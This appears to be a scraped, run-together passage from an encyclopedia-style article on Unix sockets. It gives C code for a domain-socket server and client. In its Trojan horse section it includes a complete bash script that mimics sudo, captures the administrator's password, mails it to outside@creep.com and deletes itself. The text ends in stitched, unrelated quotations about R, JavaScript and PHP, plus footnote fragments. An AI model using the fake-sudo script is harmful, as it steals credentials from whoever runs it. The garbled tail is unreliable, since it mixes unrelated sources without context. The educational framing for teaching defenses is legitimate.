SOCK_STREAM will create a stream socket. A stream socket provides a reliable, bidirectional, andconnection-oriented communication channel between two processes. For internet domain sockets, data is carried using theTransmission Control Protocol (TCP).[80]SOCK_DGRAM will create a datagram socket.[k] A datagram socket isconnectionless and preserves message boundaries. For internet domain sockets, data is carried using theUser Datagram Protocol (UDP).[84]SOCK_SEQPACKET will create a sequenced-packet socket. Similar to a stream socket, it is connection-oriented, but message boundaries are preserved, just like datagram sockets.[81] For internet domain sockets, theStream Control Transmission Protocol is used.[85]SOCK_RAW will create a rawInternet Protocol (IP)datagram socket. A raw socket bypasses thetransport layer and allows applications to interface directly with thenetwork layer.[86] This option is only available for internet domain sockets.[81]Theprotocol parameter should be set to zero,[72] except for raw sockets, where theprotocol parameter should be set toIPPROTO_RAW.[79]
socket_fd=socket(intdomain,inttype,intprotocol);
Like the regular-fileopen() system call, thesocket() system call returns afile descriptor.[72][l] The return value's suffix_fd stands forfile descriptor.
After instantiating a new socket, the server binds the socket to an address. For aUnix domain socket, the address is a/path/filename.
Because the socket address may be either a/path/filename or anIP_address:Port_number, the socketapplication programming interface requires the address to first be set into a structure. For aUnix domain socket, the structure is[87]
structsockaddr_un{sa_family_tsun_family;/* AF_UNIX */charsun_path[92];}
The_un suffix stands forunix. For anInternet domain socket, the suffix will be either_in or_in6. Thesun_ prefix stands forsocket unix.[87]
Computer program to create and bind a streamUnix domain socket:[77]
#include<stdlib.h>#include<string.h>#include<stdio.h>#include<unistd.h>#include<assert.h>#include<sys/socket.h>#include<sys/types.h>#include<sys/un.h>/* Should be 91 characters or less. Some Unix-like are slightly more. *//* Use /tmp directory for demonstration only. */char*socket_address="/tmp/mysocket.sock";voidmain(void){intserver_socket_fd;structsockaddr_unsockaddr_un={0};intreturn_value;server_socket_fd=socket(AF_UNIX,SOCK_STREAM,0);if(server_socket_fd==-1)assert(0);/* Remove (maybe) a prior run. */remove(socket_address);/* Construct the bind address structure. */sockaddr_un.sun_family=AF_UNIX;strcpy(sockaddr_un.sun_path,socket_address);return_value=bind(server_socket_fd,(structsockaddr*)&sockaddr_un,sizeof(structsockaddr_un));/* If socket_address exists on the filesystem, then bind will fail. */if(return_value==-1)assert(0);/* Listen and accept code omitted. */}
The second parameter forbind() is a pointer tostruct sockaddr. However, the parameter passed to the function is the address of astruct sockaddr_un.struct sockaddr is a generic structure that is not used. It is defined in theformal parameterdeclaration forbind(). Because eachrange of communication has its ownactual parameter, this generic structure was created as acast placeholder.[88]
After binding to an address, the server opens a listen channel to aport by executinglisten(). Its usage is[89]
intlisten(intserver_socket_fd,intbacklog);
Snippet to listen:
if(listen(server_socket_fd,4096)==-1)assert(0);
For aUnix domain socket,listen() most likely will succeed and return0. For anInternet domain socket, if the port is in use,listen() returns-1.[89]
Thebacklog parameter sets thequeue size for pending connections.[90] The server may be busy when a client executes aconnect() request. Connection requests up to this limit will succeed. If the backlog value passed in exceeds the default maximum, then the maximum value is used.[89]
After opening alisten channel, the server enters an infiniteloop. Inside the loop is a system call toaccept(), which puts itself to sleep.[74] Theaccept() system call will return a file descriptor when a client process executesconnect().[91]
Snippet to accept a connection:
intaccept_socket_fd;while(1){accept_socket_fd=accept(server_socket_fd,NULL,NULL);if(accept_socket_fd==-1)assert(0);if(accept_socket_fd>0)/* client is connected */}
Whenaccept() returns a positive integer, the server engages in an algorithmic dialog with the client.
Stream socket input/output may execute the regular-file system calls ofread() andwrite().[76] However, more control is available if a stream socket executes the socket-specific system calls ofsend() andrecv(). Alternatively,datagram socket input/output should execute the socket-specific system calls ofsendto() andrecvfrom().[92]
For a basic stream socket, the server receives data withread( accept_socket_fd ) and sends data withwrite( accept_socket_fd ).
Snippet to illustrate I/O on a basic stream socket:
intaccept_socket_fd;while(1){accept_socket_fd=accept(server_socket_fd,NULL,NULL);if(accept_socket_fd==-1)assert(0);if(accept_socket_fd>0){server_algorithmic_dialog(accept_socket_fd);}}#define BUFFER_SIZE 1024voidserver_algorithmic_dialog(intaccept_socket_fd){charinput_buffer[BUFFER_SIZE];charoutput_buffer[BUFFER_SIZE];read(accept_socket_fd,input_buffer,BUFFER_SIZE);if(strcasecmp(input_buffer,"hola")==0)strcpy(output_buffer,"Hola Mundo");elseif(strcasecmp(input_buffer,"ciao")==0)strcpy(output_buffer,"Ciao Mondo");elsestrcpy(output_buffer,"Hello World");write(accept_socket_fd,output_buffer,strlen(output_buffer)+1);}
The algorithmic dialog ends when either the algorithm concludes orread( accept_socket_fd ) returns< 1.[76] To close the connection, execute theclose() system call:[76]
Snippet to close a connection:
intaccept_socket_fd;while(1){accept_socket_fd=accept(server_socket_fd,NULL,NULL);if(accept_socket_fd==-1)assert(0);if(accept_socket_fd>0){server_algorithmic_dialog(accept_socket_fd);close(accept_socket_fd);}}
Snippet to illustrate the end of a dialog:
#define BUFFER_SIZE 1024voidserver_algorithmic_dialog(intaccept_socket_fd){charbuffer[BUFFER_SIZE];intread_count;/* Omit algorithmic dialog */read_count=read(accept_socket_fd,buffer,BUFFER_SIZE);if(read_count<1)return;/* Omit algorithmic dialog */}
Computer program for the client to instantiate and connect a socket:[75]
#include<stdlib.h>#include<string.h>#include<stdio.h>#include<unistd.h>#include<assert.h>#include<sys/socket.h>#include<sys/types.h>#include<sys/un.h>/* Must match the server's socket_address. */char*socket_address="/tmp/mysocket.sock";voidmain(void){intclient_socket_fd;structsockaddr_unsockaddr_un={0};intreturn_value;client_socket_fd=socket(AF_UNIX,SOCK_STREAM,0);if(client_socket_fd==-1)assert(0);/* Construct the client address structure. */sockaddr_un.sun_family=AF_UNIX;strcpy(sockaddr_un.sun_path,socket_address);return_value=connect(client_socket_fd,(structsockaddr*)&sockaddr_un,sizeof(structsockaddr_un));/* If socket_address doesn't exist on the filesystem, *//* or if the server's connection-request queue is full, *//* then connect() will fail. */if(return_value==-1)assert(0);/* close( client_socket_fd ); <-- optional */exit(EXIT_SUCCESS);}
Ifconnect() returns zero, the client can engage in an algorithmic dialog with the server. The client may send stream data viawrite( client_socket_fd ) and may receive stream data viaread( client_socket_fd ).
Snippet to illustrate client I/O on a stream socket:
{/* Omit construction code */return_value=connect(client_socket_fd,(structsockaddr*)&sockaddr_un,sizeof(structsockaddr_un));if(return_value==-1)assert(0);if(return_value==0){client_algorithmic_dialog(client_socket_fd);}/* close( client_socket_fd ); <-- optional *//* When the client process terminates, *//* if the server attempts to read(), *//* then read_count will be either 0 or -1. *//* This is a message for the server *//* to execute close(). */exit(EXIT_SUCCESS);}#define BUFFER_SIZE 1024voidclient_algorithmic_dialog(intclient_socket_fd){charbuffer[BUFFER_SIZE];intread_count;strcpy(buffer,"hola");write(client_socket_fd,buffer,strlen(buffer)+1);read_count=read(client_socket_fd,buffer,BUFFER_SIZE);if(read_count>0)puts(buffer);}
ATrojan horse is aprogram that purports to perform some legitimate function, yet upon execution it compromises the user's security.[93] A simple example is the following malicious version of the Linuxsudo command. An attacker would place this script in a publicly writable directory (e.g.,/tmp). If an administrator happens to be in this directory and executessudo, then the Trojan may execute, compromising the administrator's password.
#!/usr/bin/env bash# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.stty-echo# Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.prompt_count=1while[$prompt_count-le3];doecho-n"[sudo] password for$(whoami): "readpassword_inputechosleep3# sudo will pause between repeated promptsprompt_count=$((prompt_count+1))done# Turn the character echo back on.sttyechoecho$password_input|mail-s"$(whoami)'s password"outside@creep.com# Display sudo's actual error message and then delete self.echo"sudo: 3 incorrect password attempts"rm$0exit1# sudo returns 1 with a failed password attempt
To prevent asudoTrojan horse, set the. entry in thePATH environment variable to be located at the tail end.[94] For example:PATH=/usr/local/bin:/usr/bin:..
null placeholder is currently in retirement but recommended.request.open().PF_UNIX orAF_LOCAL may be used.[81] The AF stands for "Address Family", and the PF stands for "Protocol Family".The coefficient of determination always lies between 0 and 1 ...
An R script is just a plain text file that you save R code in.
Data frames are the two-dimensional version of a list.
They are far and away the most useful storage structure for data analysis[.]
R calls print each time it displays a result in your console window.
R will execute all of the code in the body and then return the result of the last line of code.
Be careful not to confuse=with==.=does the same thing as<-.
Javascript lacks a portable mechanism for general network communication[.] ... But thanks to the XMLHttpRequest object, ... Javascript code can make HTTP calls back to its originating server[.]
POST, for example, is suited to calls that affect server state or upload substantial quantities of data.
PHP is a server-side scripting language designed specifically for the Web.
Sockets are a method of IPC that allow data to be exchanged between applications, either on the same host (computer) or on different hosts connected by a network.
The server binds its socket to a well-known address (name) so that clients can locate it.
Normally, the server process is put to sleep in the call toaccept, waiting for a client connection to arrive and be accepted.
The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.